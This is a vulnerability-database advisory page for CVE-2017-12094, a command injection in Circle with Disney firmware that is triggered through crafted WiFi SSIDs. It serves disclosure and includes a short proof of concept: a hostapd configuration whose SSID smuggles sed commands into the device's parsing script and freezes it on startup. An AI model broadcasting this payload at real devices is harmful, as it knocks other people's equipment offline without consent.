Lucene search
K

Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability(CVE-2017-12094)

🗓️ 08 Nov 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 39 Views

Circle with Disney WiFi Channel parsing vulnerability in firmware 2.0.1 allows arbitrary sed command execution via specially crafted SSID

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Circle with Disney Command Injection Vulnerability (CNVD-2017-33187)
2 Nov 201700:00
cnvd
CVE
CVE-2017-12094
7 Nov 201716:00
cve
Cvelist
CVE-2017-12094
7 Nov 201716:00
cvelist
EUVD
EUVD-2017-3680
7 Oct 202500:30
euvd
NVD
CVE-2017-12094
7 Nov 201716:29
nvd
Prion
Design/Logic Flaw
7 Nov 201716:29
prion
Talos
Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability
31 Oct 201700:00
talos
Talos Blog
Vulnerability Spotlight: The Circle of a Bug’s Life
31 Oct 201712:04
talosblog

                                                The following proof of concept shows how to freeze the box on startup by broadcasting a specific SSID. The box will need manual power-cycling to boot again.


$ cat << 'EOF' > hostapd.conf
interface=wlan0
channel=1
ssid2=P"Channel: x /;:x/g;bx #Signal"
EOF
$ hostapd -B ./hostapd.conf


The SSID above is injected in the sed substitution command. Since semicolons are not escaped, they can be used to inject a new sed command.
In this example the injection creates an infinite loop by defining a "x/g" label and by jumping to it using "bx/g" (the ending "/g" is added by circle's script at [3]).
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation